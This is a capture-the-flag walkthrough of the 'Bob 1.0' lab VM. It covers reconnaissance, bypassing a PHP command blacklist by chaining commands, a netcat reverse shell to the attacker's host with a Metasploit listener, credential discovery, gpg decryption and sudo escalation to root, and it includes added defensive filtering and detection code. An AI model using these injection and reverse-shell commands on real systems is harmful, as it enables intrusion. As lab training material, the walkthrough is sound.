Lab - CTF - Bob 1.0.

1 Walkthrough

Overview

This Capture the Flag exercise is rated Beginner/Intermediate. In the scenario, the Milburg
Highschool Server was compromised, causing the school's Windows server to be replaced with
a Linux server. Your job is to find as many attack vectors as you can and access the flag
located at the root of the new Linux server.

Remember your hacking methodology and to enumerate everything!

Hardware and Software Requirements

- One virtual install of Kali Linux, updated

- One virtual install of the Bob OVA file available for download here

Administration

For this CTF, I created a desktop directory called bob. I'll be doing all my work inside of this
directory.

Enumeration

The first thing we need to do is find the target. For this, we can use netdiscover.

netdiscover -r 192.168.0.0/24

© 2018 syberoffense.com All Rights Reserved
I identify my target as 192.168.0.27. We can now run a Nmap scan of the target.

nmap -O -A -sT -sV -p- -T5 192.168.0.27 -vvv

Nmap found two services, HTTP and SSH, and some interesting files.

Searchsploit comes up negative.

We run dirb and nikto to see if anything pops up. Both provide the same results.

dirb http://192.168.0.27

nikto -h 192.168.0.27

HTTP is the low-hanging fruit and possibly our best source for an attack vector. As with all web
servers, robots.txt is always of interest: it lists the paths the site asks search engines not to
crawl, which often points at pages the owner would rather not have found.

We have two HTML files, lat_memo.html and passwords.html.

192.168.0.27/lat_memo.html

http://192.168.0.27/passwords.html

The next page is the dev_shell.php page. This is going to be our attack vector. Enumerate the
page and check out the source code.

There is a blacklist: commands like ls, pwd, cat, and nc are being blocked. Nothing we can't work
around. We can replace ls with find, echo, dir, and cat. There are also ways to chain
commands other than using a semicolon.

The double ampersand (&&) or a pipe ( | ) or double pipe ( || ) can be used to execute
commands. For instance, we can use the echo command with && to execute the id
command.

echo && id

We see that the shell is using the www-data account to run.
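As an added illustration (not the page's dev_shell.php code), the filter logic below contrasts a word blacklist like the one described above with an allowlist that refuses any input containing shell operators; it shows why `echo && id` passes the first check and not the second. The exact blocked words on dev_shell.php and the allowed commands are assumptions.

```python
import re
import shlex

# Constructed approximation of the blacklist: the page says ls, pwd, cat and
# nc are blocked; the real list on dev_shell.php is assumed.
BLACKLIST = {"ls", "pwd", "cat", "nc"}

# Hardened form: only these whole commands may reach the interpreter.
ALLOWED_COMMANDS = {"id", "echo", "uptime", "whoami"}

# Any of these characters lets a second command be chained onto the first.
SHELL_OPERATORS = re.compile(r"[;&|`$(){}<>\n]")


def blacklist_allows(cmd: str) -> bool:
    """Blacklist check: reject only if a blocked word appears as a token."""
    tokens = cmd.split()
    return not any(tok in BLACKLIST for tok in tokens)


def allowlist_allows(cmd: str) -> bool:
    """Hardened check: no chaining operators, and the first word must be allowed."""
    if not cmd or SHELL_OPERATORS.search(cmd):
        return False
    try:
        argv = shlex.split(cmd)
    except ValueError:
        # Unbalanced quotes: refuse rather than guess what the shell would do.
        return False
    return bool(argv) and argv[0] in ALLOWED_COMMANDS


def compare(cmd: str) -> dict:
    """Return both verdicts for one input so the gap between them is visible."""
    return {"blacklist": blacklist_allows(cmd), "allowlist": allowlist_allows(cmd)}


if __name__ == "__main__":
    # Constructed sample inputs mirroring the chaining the walkthrough describes.
    for sample in ["id", "ls", "echo && id", "echo | find /", "echo || id"]:
        print(f"{sample!r:20} -> {compare(sample)}")
```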

We need to establish a reverse shell, which can be done a few different ways, but simple is
always better. We can use the Metasploit framework and the exploit multi/handler
as a listener for our reverse shell using Netcat.

use exploit/multi/handler

Set the payload as linux/x86/shell/reverse_tcp

set payload linux/x86/shell/reverse_tcp

Set the payload options. The LHOST will use the IP address of our Kali machine.

show options

I type in the run command, and I have the listener up and running.

At the target's PHP shell, I type:

echo && nc 192.168.0.30 4444 -e /bin/bash


Back at the Metasploit terminal, I now have a basic shell.

Next, we use our tried and true Python code to give us an interactive shell.

python -c 'import pty; pty.spawn("/bin/bash")'
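From the defender's side, the chain just described (a web-server account running netcat with a program attached, then a Python pty upgrade) leaves a recognisable process lineage. The added example below is not part of the walkthrough; it runs a small detection over a constructed process snapshot whose field names and sample values are assumptions.

```python
import re
from dataclasses import dataclass

# Service accounts that should never be launching interactive shells.
WEB_ACCOUNTS = {"www-data", "apache", "nginx"}

# Patterns drawn from the stages of the walkthrough's shell. Order matters:
# the first matching rule names the finding.
SUSPICIOUS = [
    ("netcat with program attached", re.compile(r"\bnc(at)?\b.*\s-e\s")),
    ("pty shell upgrade", re.compile(r"pty\.spawn\(")),
    ("interactive shell as service account", re.compile(r"^(/bin/)?(ba)?sh\b")),
]


@dataclass
class Proc:
    user: str
    pid: int
    ppid: int
    cmdline: str


def detect(procs: list) -> list:
    """Return (pid, reason) for each process under a web account that matches a rule."""
    hits = []
    for p in procs:
        if p.user not in WEB_ACCOUNTS:
            continue
        for reason, pat in SUSPICIOUS:
            if pat.search(p.cmdline):
                hits.append((p.pid, reason))
                break
    return hits


# Constructed sample snapshot modelled on the walkthrough, not captured from it.
SAMPLE = [
    Proc("root", 1, 0, "/sbin/init"),
    Proc("www-data", 900, 1, "/usr/sbin/apache2 -k start"),
    Proc("www-data", 1201, 900, "sh -c echo && nc 192.168.0.30 4444 -e /bin/bash"),
    Proc("www-data", 1202, 1201, "nc 192.168.0.30 4444 -e /bin/bash"),
    Proc("www-data", 1203, 1202, "/bin/bash"),
    Proc("www-data", 1204, 1203, 'python -c import pty; pty.spawn("/bin/bash")'),
    Proc("bob", 1300, 1, "bash"),  # a real user's login shell: not flagged
]

if __name__ == "__main__":
    for pid, reason in detect(SAMPLE):
        print(pid, reason)
```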

Let’s enumerate what we have so far by listing the contents of the shell.

Let's cat out the .hint file.

Been there, done that.

We know that Bob is the admin for the school, so we should see if we can find his profile. I
get back to root and change location over to the home directory. I list the contents and
permissions of the home directory and find the following directories.

I change location over to bob and list the contents.

I use the head command to see the contents.

We have discovered the credentials for two of the four individuals found on the system.

jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

Bob has a documents folder, and inside we find a login.txt.gpg.

The secret directory is of interest, so I change location over to it and list its contents.

We find another directory named Keep_Out. We change location and list the contents.

We find another directory entitled Not_Porn. I change directory and list the contents.

We have another directory named No_Lookie_in_Here. I change directory and list the
contents.

Here we find a script named notes.sh. I cat out the contents.

We'll come back to this.

Let’s examine elliot’s home directory.

(snipped…)
We examine the adminisdumb.txt file.

More password information. We now have the following sets of credentials:

elliot:theadminisdumb
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

Seb has nothing to offer, so we can return our attention to the notes.sh file.
The first letter of each line spells out the word HARPOCRATES. Harpocrates was the Greek
god of silence, secrets, and confidentiality.

We next need to decrypt the login.txt.gpg discovered earlier in bob's documents
directory. We change location back to bob's documents and run the following command:

gpg --passphrase HARPOCRATES -d login.txt.gpg

We have the admin's credentials, so we can log on as bob using SSH.

I check to see what sudo permissions bob has.

We can now login as root using sudo su. Change location to the root directory.

List the contents, find the flag.txt file and view the contents.

End of the lab!

Summary

A lot of good stuff going on with this one. The PHP dev page was locked down with a
blacklist of disallowed commands, but we saw how to get around that roadblock. We also
learned how to create yet another reverse shell and elevate it to a more interactive shell using
Metasploit.
